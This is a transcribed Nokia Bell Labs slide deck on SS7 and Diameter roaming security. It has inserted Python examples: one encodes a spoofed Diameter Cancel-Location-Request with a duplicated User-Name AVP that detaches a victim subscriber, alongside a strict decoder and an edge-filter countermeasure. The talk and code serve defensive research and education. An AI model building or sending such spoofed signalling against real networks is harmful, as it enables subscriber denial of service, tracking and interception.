Interconnection Security - SS7 and Diameter

Interconnection Security: SS7 and Diameter
Silke Holtmanns, Nokia Bell Labs
14th November 2017

Industrial Research

Bell Labs research for signalling
Nokia Bell Labs: research for technology and communication since 1925

Nokia Bell Labs - Future Attacks and Mitigation
Research that solves real problems together with our customers

Bell Labs research lifecycle: Lab -> Problem study / Threats -> Attack design -> Attack testing -> Validation and awareness
- Theoretical studies go into attack and countermeasure design
- Validation and awareness of our research by GSMA standards input and publication
- Customer feedback and test results allow us to fine-tune and optimize our countermeasures
- Research input will fit product needs and operators' requests
- Operator needs can be discovered "live" for new research challenges and disruptive countermeasures

Routing and Signalling Security Research in Nokia Bell Labs
Silke Holtmanns, Yoan Miche, Ian Oliver
- Catching what has not been caught: telecommunication protocol security
- Finding and mitigating signalling vulnerabilities
- Telco protocols meet hackers: two worlds move towards each other
- 5G security requests
- Awareness and education on Diameter security (own company, customers, legislators)
- Attacks evolve, so must we

SS7 Security (Signalling System No. 7)

What is roaming?
(Diagram: "We are here, somewhere", with the local operators MEO, Vodafone and NOS; the meeting attendees with their home operators Telefonica, DT, Vodafone, MTS, ...; "my home mobile network operator"; colleagues and family on Elisa, TeliaSonera and DNA.)

Roaming Network – Interconnection Network
Not the Internet, but equally important

We are all connected to the Interconnection Network

History of the Interconnection Network
To understand the problem:
- Established more than 35 years ago between a few state-owned operators
- Built on trust (closed private network)
- No built-in security (in particular, no source authentication)
- The SS7 protocol was constantly extended for new services and features
- New service providers connect all the time, e.g. IPX roaming hubs, application-to-user SMS, etc.
- Now moving towards LTE / Diameter based protocols (4G/5G)

Closed & Private Network?

How do attackers get in?
- Renting a service
- Hacking
- Having power
- Bribing an employee
- Becoming an operator
- Convincing

Existing Attacks on the "old" SS7
If no protection is deployed:
- Location tracking
- Eavesdropping
- Fraud
- Denial of service (user and network)
- Credential theft
- Data session hijacking
- Unblocking stolen phones
- SMS interception
- One-time password theft and account takeover for banks, Telegram, Facebook, WhatsApp, Gmail (bitcoin)

Current Status of IPX Security
- The most commonly used protocol for interconnection is still SS7 MAP (Mobile Application Part)
- Often intermediate nodes are involved
- Often without any form of transport security: no IPsec, no TLS / DTLS, no MAPsec
- No source authentication, no integrity, no confidentiality

Diameter Security

All will be better with LTE and Diameter

All will be different with LTE and Diameter ("better" crossed out on the slide)

Attacks are reality
Why should they stop? Because we have LTE?
- Intelligence communities see mobile networks as an "all-you-can-eat data buffet" and a way for VIP tracking and eavesdropping
- Dark service companies use interconnection to make money (fraud, SMS interception, location tracking offerings)
- Military uses mobile network data for target localization
(Nokia Solutions and Networks 2014)

Service companies move with time and technology

Two LTE Networks Connect
Connection via IPX provider

A bit more realistic: IPX "tiny" example

Known Diameter Attacks
- Location tracking (NATO CyCon Conference, 2015)
- Downgrading attacks (Troopers TelcoSec 2016)
- Denial of service & fraud (Black Hat, 2016)
- SMS and one-time password interception (IEEE ICC 2017)
- Subscriber profile modification (Network and System Security 2017)
To come:
- Data interception for GPRS, LTE (potentially December 2017)

Network Attack - DoS
Network setup for DoS testing – video

Get the IMSI using SRR
Send-Routing-Info-for-SM-Request (SRR):
- Sent by the SMSC to the HSS
- Retrieves the subscriber's IMSI and the identity of the serving MME
- Used for routing a short message to the recipient

Denial of Service using CLR
Cancel-Location-Request (CLR):
- Sent by the HSS to the MME to detach the UE
- Cancellation types: MME change (location change), subscription withdrawal

IDR (Insert-Subscriber-Data-Request) usage for location tracking

One-Time Password Interception using SMS
LTE / Diameter based

Services that use SMS password recovery

Diameter Security - Old tricks come again (implementation specific)
Diameter message manipulation: Attribute Value Pair (AVP) doubling

(Diagram: the attacker sends a Diameter message with Origin MME.operator.com, Destination HSS.operatora.com, Hop-by-hop ID 1, carrying the same AVP twice with Value1 and Value2. The DEA at the edge of operator network A makes a fast decision based on Value1, ignoring Value2, and forwards the message (Hop-by-hop ID 3) to the HSS, which makes a thorough decision, iterating all values and taking Value2.)

Diameter messages can be manipulated to contain multiple AVPs of the same kind (same AVP code) even though the specification clearly says it's illegal to do so.
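The CLR from the DoS slide above and the AVP-doubling trick on this slide, worked through as an added example that is not code from the presentation: a minimal RFC 6733 encoder builds an S6a Cancel-Location-Request whose User-Name AVP is illegally repeated, and three decoders (first match, last match, exactly once) show why an edge node and a back-end node can reach different decisions on the same bytes. Command, AVP and application codes are those of 3GPP TS 29.272; the hostnames, realms and IMSIs are constructed, and the realm derivation assumes a three-digit MNC.

```python
"""Diameter on the wire: build the S6a CLR from the DoS slide, then show
the AVP-doubling trick. Added example, not code from the presentation.
Header/AVP layout per RFC 6733; command, AVP and application codes per
3GPP TS 29.272. Hostnames, realms and IMSIs below are constructed."""
import struct

APP_S6A = 16777251               # 3GPP S6a/S6d application id
CMD_CLR = 317                    # Cancel-Location-Request / -Answer
VENDOR_3GPP = 10415
AVP_USER_NAME = 1                # carries the IMSI on S6a
AVP_ORIGIN_HOST, AVP_ORIGIN_REALM = 264, 296
AVP_DEST_HOST, AVP_DEST_REALM = 293, 283
AVP_CANCELLATION_TYPE = 1420     # 3GPP vendor-specific Enumerated
SUBSCRIPTION_WITHDRAWAL = 2      # Cancellation-Type value (TS 29.272)


def avp(code, data, vendor=None, mandatory=True):
    """One AVP: code(4) flags(1) length(3) [vendor-id(4)] data, padded to 4 bytes;
    the length field excludes the padding."""
    flags = 0x40 if mandatory else 0
    vendor_field = b""
    if vendor is not None:
        flags |= 0x80
        vendor_field = struct.pack("!I", vendor)
    length = 8 + len(vendor_field) + len(data)
    pad = b"\x00" * (-len(data) % 4)
    return struct.pack("!II", code, (flags << 24) | length) + vendor_field + data + pad


def diameter_message(cmd_code, app_id, avps, hop_by_hop, end_to_end, request=True):
    """20-byte header: version 1 | length, flags | command, app id, hop-by-hop, end-to-end."""
    body = b"".join(avps)
    return struct.pack("!IIIII", (1 << 24) | (20 + len(body)),
                       ((0x80 if request else 0) << 24) | cmd_code,
                       app_id, hop_by_hop, end_to_end) + body


def build_clr(imsis, origin_host, origin_realm, dest_host, dest_realm, hbh=1, e2e=1):
    """CLR as an HSS sends it to the serving MME. Origin-Host/-Realm are plain strings
    chosen by the sender: without IPsec/TLS nothing on the wire proves them.
    `imsis` is a list so a caller can illegally repeat User-Name."""
    avps = [avp(AVP_ORIGIN_HOST, origin_host.encode()), avp(AVP_ORIGIN_REALM, origin_realm.encode()),
            avp(AVP_DEST_HOST, dest_host.encode()), avp(AVP_DEST_REALM, dest_realm.encode())]
    avps += [avp(AVP_USER_NAME, i.encode()) for i in imsis]
    avps.append(avp(AVP_CANCELLATION_TYPE, struct.pack("!i", SUBSCRIPTION_WITHDRAWAL),
                    vendor=VENDOR_3GPP))
    return diameter_message(CMD_CLR, APP_S6A, avps, hbh, e2e)


def parse_avps(msg):
    """[(code, vendor, data)] in wire order, skipping the 20-byte header."""
    out, off = [], 20
    while off < len(msg):
        code, fl_len = struct.unpack_from("!II", msg, off)
        flags, length = fl_len >> 24, fl_len & 0xFFFFFF
        vendor = struct.unpack_from("!I", msg, off + 8)[0] if flags & 0x80 else None
        hdr = 12 if vendor is not None else 8
        out.append((code, vendor, msg[off + hdr:off + length]))
        off += (length + 3) & ~3         # step over the padding
    return out


def first_value(avps, code):
    """Fast path: stop at the first match (the DEA in the slide)."""
    return next((d for c, _, d in avps if c == code), None)


def last_value(avps, code):
    """Thorough path: iterate everything, last write wins (the HSS in the slide)."""
    val = None
    for c, _, d in avps:
        val = d if c == code else val
    return val


def strict_value(avps, code):
    """Hardened: an AVP the command ABNF allows once must occur exactly once."""
    vals = [d for c, _, d in avps if c == code]
    if len(vals) != 1:
        raise ValueError("AVP %d occurs %d times, expected 1" % (code, len(vals)))
    return vals[0]


def home_realm(imsi):
    """EPC realm from the IMSI per 3GPP TS 23.003 (3-digit MNC assumed here)."""
    return "epc.mnc%s.mcc%s.3gppnetwork.org" % (imsi[3:6], imsi[:3])


def demo():
    """Attacker posing as the HSS of (constructed) network 001/010 doubles User-Name:
    a decoy IMSI from its own realm first, a 310/410 subscriber on the target MME second."""
    decoy, victim = "001010000000001", "310410000000001"
    msg = build_clr([decoy, victim], "hss.epc.mnc010.mcc001.3gppnetwork.org",
                    "epc.mnc010.mcc001.3gppnetwork.org",
                    "mme.epc.mnc410.mcc310.3gppnetwork.org",
                    "epc.mnc410.mcc310.3gppnetwork.org")
    avps = parse_avps(msg)
    origin_realm = first_value(avps, AVP_ORIGIN_REALM).decode()
    edge_imsi = first_value(avps, AVP_USER_NAME).decode()   # what the edge checks
    mme_imsi = last_value(avps, AVP_USER_NAME).decode()     # what the MME acts on
    try:
        strict_value(avps, AVP_USER_NAME)
        strict_ok = True
    except ValueError:
        strict_ok = False
    return {"edge_check_passes": home_realm(edge_imsi) == origin_realm,
            "edge_sees": edge_imsi, "mme_detaches": mme_imsi, "strict_accepts": strict_ok}
```

`demo()` returns a dict showing that the realm plausibility check at the edge passes on the decoy IMSI while the last-match decoder hands the victim's IMSI to the detach logic; only `strict_value` refuses the message. The fix is in the decoder, not the firewall rule: reject any message in which an AVP with a single-occurrence ABNF position appears more than once, before any value is used.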

IoT & Interconnection

Who are IoT B2B customers?
Segments: public sector, energy, transportation, large enterprises.
Examples: public safety, utilities, defense, government broadband, smart cities / smart government, electricity, oil, gas & mining, utility broadband, railways, highways, logistics, aviation/airports, maritime, financial, healthcare, automotive, retail.

There might be many roaming IoT devices
- Even meters, building sensors etc. may roam (coverage reasons), in particular for global operators
- Normal roaming, e.g. cars, logistics etc.
- Broker SIMs (e.g. Apple iSIM)
- Ease of production
- New business models, e.g. a global company wanting to have a "harmonized" infrastructure and being supplied by one connectivity supplier
- Large amounts of the same device types behaving in the same consistent manner
(Diagram: a meter in country A with a country B USIM on an eUICC connects as a roamer; the country B operator belongs to the same operator group as another country A operator; traffic passes over the IPX network or a VPN; no direct access.)
(Nokia Solutions and Networks 2014, GSMA Member Confidential)

"Classical" Interconnection Risks
Affecting also IoT devices:
- Location tracking
- Fraud
- Credential theft
- SMS attacks: interception; spoofing (steering messages / reporting messages)
- GTP data attacks: session hijacking; cryptographic key theft (potentially used on the air interface)

3GPP Release 14 - IoT Extensions (TS 23.682)
- Trust model for new interfaces is the same as for the existing ones: 3GPP TS 33.210 to be used for connecting to partners
- Easy interworking and access for machine service providers
- Non-MSISDN based devices: external identifier (DNS resolvable)
- New nodes and interworking functions to allow seamless integration into existing networks

3GPP TS 23.682 - Protocols
(Figure 4.2-1b: 3GPP Architecture for Machine-Type Communication (Roaming). Nodes shown: MTC UE application, UE, RAN, MME, SGSN, S-GW, GGSN/P-GW, MSC, IP-SM-GW, SMS-SC/GMSC/IWMSC, SME, CDF/CGF, HSS, MTC-AAA, MTC-IWF, SCEF, IWK-SCEF, Services Capability Server (SCS), Application Server (AS). Interfaces: Um/Uu/LTE-Uu, T4, SGd, Tsms, E, S6n, Gd, Rf/Ga, S6m, Tsp, S6t, T7, T6a, T6b, SGs, Gi/SGi, API. Protocols: SMS protocols, Diameter (SMS using Diameter, maybe MAP/IP fallback), GTP. Control plane / user plane; HPLMN / VPLMN split; direct model, indirect model and hybrid model for SCS/AS access.)

IoT and Interconnection - Summary
New IoT interfaces bring new risks:
- Some risks are similar to existing risks, but could be "larger in scale"
- The trust model needs to be carefully studied when opening up new interfaces
- Business models (i.e. coverage) may suddenly open up interfaces that were not designed for interconnection, i.e. extra protection is needed
New security approaches for IoT roaming:
- Understanding and profiling of groups of devices
- Roaming-specific aspects for groups of IoT devices need to be taken into account at the network edge
- Specific IoT group filtering capabilities needed in the long run
Today:
- One subscription is roughly like another from a security point of view (exception: pre-paid)

Countermeasures

Let's use IPsec
Good idea, but...
- IPsec for Diameter is standardized
- It's all IP, let's use IPsec! Maybe not that easy:
  - Not all is IP (some parts of SS7 / interworking)
  - Who will host / create root certificates?
  - Operators in developing countries
  - Interconnection service providers: only hop-by-hop security
  - Nodes are difficult to upgrade
- Still no protection against:
  - Partners renting out to "service companies"
  - Hacked nodes
  - Bribed employees
  - Governmental ties

Countermeasures for operators
Detect:
- Monitor network traffic
- Penetration testing & re-testing
- Tenant monitoring
Mitigate:
- Filter, filter, filter
- Signalling firewall
- SMS home routing
Cooperate:
- Share experiences (GSMA)
- IPsec with partners, e.g. EU
- Cooperation with legislators
Prepare:
- Follow GSMA FS.11, FS.19, FS.07
- Find weak spots
- Node hardening / procedures
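To make "filter, filter, filter", the signalling firewall and SMS home routing concrete, here is an added example (not from the presentation, and not a reproduction of the GSMA FS.19 rules) of plausibility checks a Diameter edge agent can run on already-decoded messages: peer allow-listing, Origin-Host/Origin-Realm consistency, accepting a CLR only from the realm the IMSI belongs to, and handing an interconnect SRR for an own subscriber to the SMS router instead of answering with the real IMSI and MME. The own realm, the partner allow-list and all IMSIs are constructed; the realm derivation follows 3GPP TS 23.003 and assumes a three-digit MNC.

```python
"""Plausibility filtering at a Diameter edge agent, on already-decoded messages.
Added example, not from the presentation and not a reproduction of GSMA FS.19.
OWN_REALM, the partner allow-list and all IMSIs are constructed; realm derivation
follows 3GPP TS 23.003 and assumes a 3-digit MNC."""

CMD_CLR = 317          # S6a Cancel-Location-Request (3GPP TS 29.272)
CMD_SRR = 8388647      # S6c Send-Routing-Info-for-SM-Request (3GPP TS 29.338)

OWN_REALM = "epc.mnc410.mcc310.3gppnetwork.org"
PARTNER_HOSTS = {"hss.epc.mnc010.mcc001.3gppnetwork.org",
                 "smsc.epc.mnc010.mcc001.3gppnetwork.org",
                 "hss.epc.mnc020.mcc002.3gppnetwork.org"}


def home_realm(imsi):
    return "epc.mnc%s.mcc%s.3gppnetwork.org" % (imsi[3:6], imsi[:3])


def check(msg):
    """msg: dict of decoded AVPs. Returns (verdict, reason) where verdict is
    'allow', 'block' or 'home-route' (pass to the SMS router, which answers
    with its own address instead of the real IMSI and serving MME)."""
    host, realm = msg["Origin-Host"], msg["Origin-Realm"]
    if host not in PARTNER_HOSTS:
        return "block", "unknown peer " + host
    if not host.endswith("." + realm):
        return "block", "Origin-Host %s is not inside Origin-Realm %s" % (host, realm)
    imsi = msg.get("User-Name", "")
    if msg["Command-Code"] == CMD_CLR:
        # Only the subscriber's own HSS cancels a location, so for an inbound
        # roamer the IMSI must resolve to the realm the message claims to come from.
        if home_realm(imsi) != realm:
            return "block", "CLR for %s from foreign realm %s" % (imsi, realm)
        return "allow", "CLR from the home HSS of " + imsi
    if msg["Command-Code"] == CMD_SRR:
        if home_realm(imsi) != OWN_REALM:
            return "block", "SRR for non-subscriber " + imsi
        # Legitimate MT-SMS delivery needs an answer, but the answer must not
        # leak IMSI and MME to the interconnect: SMS home routing.
        return "home-route", "SRR from interconnect for own subscriber " + imsi
    return "block", "no rule for command %d, default deny" % msg["Command-Code"]


def sample_traffic():
    """Constructed decoded messages as the edge agent of OWN_REALM would see them."""
    partner = "epc.mnc010.mcc001.3gppnetwork.org"
    return [
        {"Command-Code": CMD_CLR, "Origin-Host": "hss." + partner, "Origin-Realm": partner,
         "User-Name": "001010000000001"},       # partner detaching its own roamer
        {"Command-Code": CMD_CLR, "Origin-Host": "hss." + partner, "Origin-Realm": partner,
         "User-Name": "002020000000009"},       # DoS attempt on another network's roamer
        {"Command-Code": CMD_SRR, "Origin-Host": "smsc." + partner, "Origin-Realm": partner,
         "User-Name": "310410000000007"},       # MT SMS (or an IMSI/MME probe) for our subscriber
        {"Command-Code": CMD_SRR, "Origin-Host": "hss." + partner, "Origin-Realm": partner,
         "User-Name": "002020000000009"},       # SRR for somebody who is not ours
        {"Command-Code": CMD_CLR, "Origin-Host": "hss.epc.mnc999.mcc999.3gppnetwork.org",
         "Origin-Realm": "epc.mnc999.mcc999.3gppnetwork.org",
         "User-Name": "999999000000001"},       # not a roaming partner at all
    ]


def verdicts():
    return [check(m)[0] for m in sample_traffic()]
```

`verdicts()` yields allow, block, home-route, block, block for the five constructed messages. Two caveats a practitioner would add: the checks only see what the decoder gives them, so they belong behind a strict decoder that rejects duplicated AVPs; and an allow-listed host that is itself compromised or rented out still passes the peer check, which is the point of the "still no protection against" list on the IPsec slide.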

Summary

Summary
- Interconnection attacks are reality, but the current main focus is SS7; attackers also move with technology
- LTE/Diameter has similar functionality, hence similar attacks are possible there
- Security is not part of the operator core business model; impacts and risks are too large to ignore
- Independent of phone, platform or device
- Will LTE face similar interconnection weaknesses as SS7? If networks don't take protection measures, then yes.

Questions?
Silke.Holtmanns@nokia.com
